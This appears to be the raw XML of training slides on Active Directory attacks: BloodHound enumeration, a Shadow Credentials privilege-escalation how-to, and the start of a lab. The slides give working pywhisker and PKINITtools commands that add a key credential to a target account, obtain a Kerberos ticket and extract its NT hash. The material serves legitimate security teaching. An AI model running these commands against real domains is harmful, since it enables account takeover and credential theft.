                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Bloodhound is an Active Directory modeling tool </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Enumerate LDAP &amp; Catalog of AD, collect all objects within AD </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Uses Graph Theory: Shows objects' (nodes) relationship (edge) among each other </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16386" name="Picture 2" descr="BloodHound Active Directory queries for Defenders - Koen ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47BABDE-1772-6A40-84E8-0F7D8DC54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360" y="2208980"/>
            <a:ext cx="4044348" cy="27423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63B5A2D-DD46-4A13-B901-27B425CB55AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81144" y="2209871"/>
            <a:ext cx="445315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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:t>Bloodhound-python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:t>Remotely login to each machine and collect the required information for bloodhound</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bloodhound-python -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>validUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>validPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>All,Session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="IBM Plex Sans"/>
              <a:ea typeface="IBM Plex Sans" charset="0"/>
              <a:cs typeface="IBM Plex Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303741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4E8A-AB35-25CE-01A1-C80A3F74EF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before we begin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61AB8916-201A-C83E-0FF5-2D809B637F06}"/>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F74F185B-76D0-4763-BE20-5BCBA69FC3A6}"/>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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F6AEC1-2C45-5D2F-0D25-C99C37A10129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764699" y="737482"/>
            <a:ext cx="6948673" cy="3008376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>These are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>REFERENCE SLIDES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, there are tons of words, we know.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>EVERY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>attack, this is just a LOT of attacks. There is way more out there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Type out commands, helps you learn better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This also dodges weird encoding errors with dashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>If we are speaking too fast, let us know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953770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AD Privilege Escalation &gt; Shadow Creds</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40</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1037645"/>
            <a:ext cx="5497841" cy="3068210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>It is possible to add something called “Key Credentials” to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>of a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This allows you to use these credentials to authenticate as that user over Kerberos with certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This shows up in bloodhound as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>GenericAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>AddKeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> , or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>GenericWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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026" name="Picture 2" descr="Sonic Shadow Hedgehog Cosplay - Etsy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7276E298-A1DF-3941-14FC-FD2793DB3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811" y="1037645"/>
            <a:ext cx="28575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25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AD Privilege Escalation &gt; Shadow Creds– How To</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41</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58302"/>
            <a:ext cx="8266265" cy="4032616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Get a cert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/pywhisker/pywhisker.py -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -t target --dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --action add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Get a TGT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/PKINITtools/gettgtpkinit.py -cert-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>cert.pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>-pass $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>passwordFromAbove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>filename.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> file environment variable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>export KRB5CCNAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>filename.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Get NT Hash from TGT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/PKINITtools/getnthash.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/target -key $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>keyFromAbove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>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2545315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AD Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="770C28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab 3 </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42</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a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>  Run Bloodhound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ingestor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (bloodhound.py) to collect LDAP data   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
